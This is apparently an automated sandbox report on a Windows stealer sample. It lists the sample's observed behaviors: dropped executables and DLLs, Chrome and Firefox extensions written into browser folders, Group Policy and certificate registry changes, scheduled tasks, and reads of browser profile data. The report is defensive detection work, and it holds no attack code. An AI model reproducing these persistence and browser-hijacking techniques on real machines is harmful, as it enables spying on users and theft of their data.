Malware Analysis Report

2025-08-11 06:23

Sample ID 240403-m2kxbacg62
Target a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3
SHA256 a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3
Tags
discovery spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3

Threat Level: Likely malicious

The file a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3 was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Drops Chrome extension

Drops desktop.ini file(s)

Checks installed software on the system

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-03 10:57

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-03 10:57

Reported

2024-04-03 11:00

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a6e1955ddc6a22cf9fe64148610b0cacacd49f94fc2ea0092e0f23059d27d4b3.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\FgUeXjG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\FgUeXjG.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\nDjUBsQ.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\qgqTozQ.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\ZrKIiHQ.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ufxOSMW.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\lvtmEFA.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\gSDcrr.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\OWVjaur.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\FGLQcKv.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\DgeSUDDcOrerc.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bCAdHbOFiqtMCRhbmR.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\ZJggANjsYpCqsGjEe.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\kkPqOHrufYpxTagPJ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6CC4.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ef76cfc2-0000-0000-0000-d01200000000} C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ef76cfc2-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\IELGwaU.exe N/A
